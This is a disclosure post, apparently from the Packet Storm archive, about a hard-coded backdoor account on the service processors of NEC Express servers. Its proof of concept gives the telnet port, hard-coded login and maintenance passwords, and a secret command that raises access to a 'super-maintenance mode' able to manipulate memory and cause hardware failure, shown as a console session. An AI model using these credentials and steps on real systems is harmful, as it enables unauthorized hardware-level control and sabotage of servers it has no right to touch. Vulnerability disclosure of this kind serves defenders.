what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

NEC Backdoor Administrative Account

NEC Backdoor Administrative Account
Posted May 12, 2012
Authored by Djamshut Saarash

It appears that high performance servers from NEC suffer from a hard-coded administrative account that can manipulate memory.

tags | exploit
SHA-256 | eb4272908d1ad7c1709578a39de60f3cbe679c413cb078dd31662645958fdcb3

NEC Backdoor Administrative Account

Change Mirror Download
   H!

NEC Corp. has a product line of high perfomance servers
- http://www.nec.com.sg/index.php?q=products/enterprise-servers

In the documentations it is said that there is two user privilege
levels:

1. Common user - who can monitor the system status

2. Admin user - for configuring system hardware

but there is another very high privilege user, who can manipulate
memory and produce hardware falure.


POC

Connect to the service processor of the NEC Express server with the
telnet client on port 5001:


Integrated Service Processor.

Cabinet-ID:xx, Location:y, State:ssssss

iSP login: spfw<ENTER>

iSP password: nec<ENTER>

Copyright (C) 2005 NEC Corporation, All Rights Reserved.

Welcome to Integrated Service Processor.

iSP FW version : 01.00 generated on 01/01/2005 19:20:33

iSP MAIN MENU

0) OS(BIOS) serial console of partition#0 (INITIALIZING )

1) OS(BIOS) serial console of partition#1 (RUNNING )

V) Virtual System Operator Panel

S) iSP commands

E) Exit

DISCONNECTALL) disconnect all console connections

iSPyz> s<ENTER>


Go to maintanance mode with the command "cm", default password mainte

Now at the command mode enter (With the periods at the end):


iSP0m:MNT> nec=topvendor.

??? : good-bye.

Command mode was changed to super-maintenance mode.

BE CAREFUL to use each command.

iSP0m:@@@>


you now have super admin rights at the hardware level of the
supercomputer!


Thats it.....
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close